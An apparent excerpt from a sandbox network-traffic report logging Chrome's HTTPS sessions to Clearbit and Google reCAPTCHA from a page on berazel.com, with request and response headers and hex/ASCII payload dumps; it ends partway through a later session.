                                                                                                                          9192.168.2.164972613.227.8.654437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:03 UTC358OUTGET /housingcenter.com HTTP/1.1
                                                                                                                          Host: logo.clearbit.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:04 UTC555INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          Cache-Control: public, max-age=2592000
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:01 GMT
                                                                                                                          x-envoy-response-flags: -
                                                                                                                          Server: Clearbit
                                                                                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 826a2a976365ee438094cd8d4b556040.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                          X-Amz-Cf-Id: FTO2RHR2qnJ11cnq5K3oWBa19zZMYzpvjAuyyXh4-s9I5ryTpuSLkw==
                                                                                                                          Age: 3
                                                                                                                          2024-12-19 16:08:04 UTC6398INData Raw: 31 38 66 36 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 1d f5 49 44 41 54 78 9c ec 7d 09 98 5c 57 75 e6 59 ee 7d af aa ba d5 5a 1d 0b 6c b0 59 c6 c6 7c 18 98 61 8b c7 81 40 c8 4c 80 00 36 61 58 02 04 08 03 71 c8 64 81 19 12 76 02 1f 3b 86 cc b0 04 98 21 c3 32 24 01 6c 18 3b 0c 84 d5 89 21 6c 86 98 2d ec 8e 6d bc 08 5b b2 25 b9 25 75 55 bd 77 ef 39 67 be 7b df ab 56 db 46 d5 76 97 ec aa 16 3a df fb f4 b5 a4 ae 57 f7 9d 73 ef 59 ff 73 9e 33 33 98 51 5a 04 e8 80 95 06 80 98 fe ae 00 02 86 80 2e 54 57 47 ff 91 2f 7d f7 bf 3d e4 64 f0 25 90 01 90 59 fa ad 88 46 00 04 38 ed c5 df 52 a2 69 2f e0 d0 64 1b 05 ca 0a 21 31 d3 c0 40 40 97 bc 2d a9 c2 bf f8 f2 cf 3e 70 c1 bb ce bd 10 0a 17 d1 0c 54 4c
                                                                                                                          Data Ascii: 18f6PNGIHDRL\IDATx}\WuY}ZlY|a@L6aXqdv;!2$l;!l-m[%%uUw9g{VFv:WsYs33QZ.TWG/}=d%YF8Ri/d!1@@->pTL
                                                                                                                          2024-12-19 16:08:04 UTC1343INData Raw: 35 33 38 0d 0a a7 b8 ec c3 4b 53 6d e3 b2 2a a0 cf a5 57 ec 36 c8 c7 b8 84 5e 86 5a 03 ce 19 f6 9b 66 04 04 a5 16 14 a9 b9 0d 9d 0c e9 16 40 d0 d6 07 4d d9 08 53 53 98 69 0b 90 f1 d1 ff fe 94 bb 6f d0 0d 61 37 49 1f 88 8c 9c 51 a1 58 28 ba 0c 08 4b c2 68 50 27 47 0c 4d f7 65 9e de 2b 94 06 9d 16 2f 16 ee 7f e2 b1 ef fd af cf 38 19 16 37 d7 3b f2 1e 57 e0 0c 42 f0 1d 45 ce 2f 62 1b 4d 62 9a b1 f9 ab 6b a6 e9 9e 80 b6 9c 33 aa f1 a1 13 3d f5 c4 6d 7f f3 97 6f 7c c4 83 ee d9 a9 16 bd 0c 0b 19 a2 23 8b 31 cf a6 c3 f5 f9 d6 ec 71 34 fd b7 a9 1e 7c df 2c 02 ab ce 23 9c b8 d5 bf fe 79 bf f3 f4 c7 3f ba 8c 4b 2c 43 cb 48 7c d0 11 38 7e e6 a6 0f 4f 44 d3 3d 01 98 d1 30 30 1a fc 5a 20 7b 02 f5 aa c7 01 bc e6 f1 f7 f9 8b b3 ce b8 3b 2f ce cb 22 84 25 c4 d6 05 c2 8c
                                                                                                                          Data Ascii: 538KSm*W6^Zf@MSSioa7IQX(KhP'GMe+/87;WBE/bMbk3=mo|#1q4|,#y?K,CH|8~OD=00Z {;/"%
                                                                                                                          2024-12-19 16:08:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.1649728172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:05 UTC931OUTGET /recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4z HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://berazel.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:06 UTC1161INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:05 GMT
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-JtUGLyVkGfWxWbaOMil5RQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:06 UTC229INData Raw: 35 37 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79
                                                                                                                          Data Ascii: 57cd<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cy
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34
                                                                                                                          Data Ascii: rillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A64
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44 2d 30 32 43 35 2c 20 55 2b 30 32 43 37 2d 30 32 43 43 2c 20 55 2b 30 32
                                                                                                                          Data Ascii: 0AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20
                                                                                                                          Data Ascii: font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto'; font-style: normal; font-weight:
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27
                                                                                                                          Data Ascii: ormat('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { font-family: '
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a
                                                                                                                          Data Ascii: /s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCxc4EsA.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 4a 74 55 47 4c 79 56 6b 47 66 57 78 57 62 61 4f 4d 69 6c 35 52 51 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 63 2d 61 6e 63 68 6f 72 2d 61 6c 65 72 74 22 20 63 6c 61 73 73 3d 22 72 63 2d 61 6e 63 68 6f 72 2d 61 6c 65 72 74 22 3e 3c 2f 64 69 76 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 2d 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 30 33 41 46 63 57 65 41 34 43 56 56 6d 72 34 52 4c 54 62 6d 65 70 51 2d 39 74 7a 48 67 7a 46 47 6d 65 76 37 55 6b 7a 30 6d 4f 2d 5a 56 79 45
                                                                                                                          Data Ascii: 6n_hKMa_Y7UpFyA37/recaptcha__en.js" nonce="JtUGLyVkGfWxWbaOMil5RQ"> </script></head><body><div id="rc-anchor-alert" class="rc-anchor-alert"></div><input type="hidden" id="recaptcha-token" value="03AFcWeA4CVVmr4RLTbmepQ-9tzHgzFGmev7Ukz0mO-ZVyE
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 30 7a 4f 77 70 51 45 4d 4f 32 72 4b 2d 65 37 34 4b 48 6d 79 78 31 75 43 51 6c 47 54 6c 52 48 62 6a 56 57 72 57 37 76 34 32 52 38 36 48 4e 6d 73 4d 49 65 7a 64 55 71 79 55 39 47 72 38 33 41 66 74 6b 61 73 55 61 35 46 6c 5a 64 62 36 52 75 44 79 61 36 66 79 46 5f 71 5a 32 55 2d 4a 68 53 2d 2d 31 67 58 54 57 34 5a 56 44 32 59 7a 34 73 63 79 38 36 73 71 4f 32 4c 5f 57 58 46 45 70 61 71 57 30 79 70 68 72 43 39 50 6a 7a 79 4c 44 61 55 74 54 6c 30 4d 75 54 5a 34 4e 42 51 41 54 77 44 54 55 6c 67 65 50 33 61 36 4f 30 58 5f 72 37 6b 33 72 34 50 4b 30 6c 43 78 78 6c 67 54 4f 49 59 37 56 33 4d 56 59 31 6a 6a 6b 53 51 5a 30 69 6f 55 5f 6e 64 50 6c 76 5a 55 59 5f 34 32 53 4c 67 63 4c 59 44 6f 35 6e 4d 48 42 4d 47 38 77 53 63 57 34 4e 68 43 4e 43 51 4a 51 67 6d 58 49 52
                                                                                                                          Data Ascii: 0zOwpQEMO2rK-e74KHmyx1uCQlGTlRHbjVWrW7v42R86HNmsMIezdUqyU9Gr83AftkasUa5FlZdb6RuDya6fyF_qZ2U-JhS--1gXTW4ZVD2Yz4scy86sqO2L_WXFEpaqW0yphrC9PjzyLDaUtTl0MuTZ4NBQATwDTUlgeP3a6O0X_r7k3r4PK0lCxxlgTOIY7V3MVY1jjkSQZ0ioU_ndPlvZUY_42SLgcLYDo5nMHBMG8wScW4NhCNCQJQgmXIR
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 4c 32 6f 77 5a 6d 51 7a 57 46 64 7a 59 6e 42 68 61 6c 46 31 54 54 4e 43 65 6d 64 77 53 32 56 46 64 57 68 52 52 6a 4e 52 51 30 4a 55 53 33 4a 59 4e 6e 56 59 56 47 39 4f 53 30 77 33 61 6d 6c 6e 62 58 42 6a 4d 6c 70 6c 4c 30 78 55 4e 79 39 69 59 6e 56 6f 4d 44 59 33 53 58 59 79 52 48 6c 32 54 47 5a 33 63 44 68 6c 57 47 6c 53 4e 57 67 32 53 31 49 32 65 54 6b 78 4f 57 56 6f 55 32 6b 76 4c 7a 64 4a 51 6c 6b 34 56 55 78 49 63 30 30 35 62 58 46 6d 53 6d 64 33 63 33 42 4e 4e 30 35 76 4d 30 4a 76 52 6e 70 46 54 30 35 52 62 33 64 6f 4d 46 63 77 57 55 56 50 5a 32 4d 33 5a 45 51 76 54 32 39 48 63 6a 56 51 4d 6d 52 68 4d 6d 6c 54 54 30 5a 44 61 46 42 42 64 55 56 4f 56 6a 6c 35 62 47 46 6b 63 46 46 73 63 54 6c 7a 54 46 52 4a 54 30 64 51 5a 31 64 35 62 6a 5a 72 59 6c 4a
                                                                                                                          Data Ascii: L2owZmQzWFdzYnBhalF1TTNCemdwS2VFdWhRRjNRQ0JUS3JYNnVYVG9OS0w3amlnbXBjMlplL0xUNy9iYnVoMDY3SXYyRHl2TGZ3cDhlWGlSNWg2S1I2eTkxOWVoU2kvLzdJQlk4VUxIc005bXFmSmd3c3BNN05vM0JvRnpFT05Rb3doMFcwWUVPZ2M3ZEQvT29HcjVQMmRhMmlTT0ZDaFBBdUVOVjl5bGFkcFFscTlzTFRJT0dQZ1d5bjZrYlJ
                                                                                                                          2024-12-19 16:08:06 UTC1390INData Raw: 59 32 52 32 4e 4f 62 44 6b 77 62 47 64 4b 55 45 63 35 5a 45 31 6b 4e 47 70 6b 64 44 4a 6e 4e 7a 52 56 55 47 46 33 62 6d 31 69 4f 45 39 6c 5a 55 64 4f 4b 79 39 51 51 58 68 73 54 45 64 49 56 47 67 78 63 54 64 70 63 48 4e 55 4d 45 64 58 56 6e 56 56 56 6c 4a 42 59 31 42 46 4b 33 56 52 51 6e 49 7a 4d 33 64 4e 59 56 52 4c 54 33 6c 59 56 44 68 4b 55 44 68 6f 55 44 6c 6e 54 55 6c 56 4e 54 52 6a 62 6d 5a 53 53 48 6c 36 52 54 64 50 4d 6c 70 69 4d 6b 4e 48 51 33 4e 77 57 55 5a 30 52 31 68 4d 56 46 64 36 62 6a 4e 74 62 57 74 6d 56 33 56 79 4d 6d 4d 31 54 58 5a 36 55 53 74 43 64 47 78 42 63 48 56 48 4d 32 68 53 5a 30 70 6a 4d 45 46 51 4d 55 39 42 5a 57 51 79 56 48 46 31 53 31 70 36 53 6e 64 70 55 32 39 7a 61 33 5a 48 54 58 5a 48 64 6d 39 56 4e 6e 41 76 5a 58 5a 78 64
                                                                                                                          Data Ascii: Y2R2NObDkwbGdKUEc5ZE1kNGpkdDJnNzRVUGF3bm1iOE9lZUdOKy9QQXhsTEdIVGgxcTdpcHNUMEdXVnVVVlJBY1BFK3VRQnIzM3dNYVRLT3lYVDhKUDhoUDlnTUlVNTRjbmZSSHl6RTdPMlpiMkNHQ3NwWUZ0R1hMVFd6bjNtbWtmV3VyMmM1TXZ6UStCdGxBcHVHM2hSZ0pjMEFQMU9BZWQyVHF1S1p6SndpU29za3ZHTXZHdm9VNnAvZXZxd


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.1649733172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:11 UTC836OUTGET /recaptcha/api2/webworker.js?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                          Sec-Fetch-Dest: worker
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4z
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:12 UTC917INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:12 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:12 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:12 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                          Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js');
                                                                                                                          2024-12-19 16:08:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.1649734172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:11 UTC824OUTGET /js/bg/Xe7AbhhPfZcEikoNmhghBXAEhOusDIBKWKS_roS4Q7E.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4z
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:12 UTC812INHTTP/1.1 200 OK
